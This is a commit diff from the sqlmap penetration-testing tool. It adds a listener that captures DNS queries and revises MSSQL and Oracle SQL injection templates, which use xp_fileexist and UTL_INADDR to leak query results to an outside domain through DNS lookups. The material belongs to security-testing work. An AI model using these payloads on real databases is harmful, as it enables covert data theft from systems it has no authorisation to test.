more minor updates regarding data retrieval through DNS channel

2025-02-03 05:04:11 +03:00 · 2012-03-27 19:29:24 +00:00 · 2012-03-27 19:29:24 +00:00 · 769b0d0ae7
commit 769b0d0ae7
parent 9199ce5054
3 changed files with 26 additions and 2 deletions
--- a/lib/request/dnsquery.py
+++ b/lib/request/dnsquery.py
@ -7,6 +7,9 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import socket
+import threading
+
 class DNSQuery:
    """
    Used for making fake DNS resolution responses based on received
@ -42,3 +45,24 @@ class DNSQuery:
            retval += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP

        return retval
+
+class DNSServer:
+    def __init__(self):
+        self._requests = []
+
+    def run(self):
+        def _():
+            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+            s.bind(("", 53))
+
+            try:
+                while True:
+                    data, addr = s.recvfrom(1024)
+                    _ = DNSQuery(data)
+                    s.sendto(_.response("127.0.0.1"), addr)
+                    self._requests.append(_._query)
+            finally:
+                s.close()
+
+        thread = threading.Thread(target=_)
+        thread.start()
--- a/procs/mssqlserver/dns_request.txt
+++ b/procs/mssqlserver/dns_request.txt
@ -1,3 +1,3 @@
 DECLARE @host varchar(1024);
-SELECT @host = (%QUERY%) + '.%DOMAIN%';
+SELECT @host = '%PREFIX%' + (%QUERY%) + '%SUFFIX%' + '.%DOMAIN%';
 EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
--- a/procs/oracle/dns_request.txt
+++ b/procs/oracle/dns_request.txt
@ -1 +1 @@
-SELECT UTL_INADDR.GET_HOST_ADDRESS((%QUERY%)||%DOMAIN%) FROM DUAL
+SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%'||(%QUERY%)||'%SUFFIX%'||'.%DOMAIN%') FROM DUAL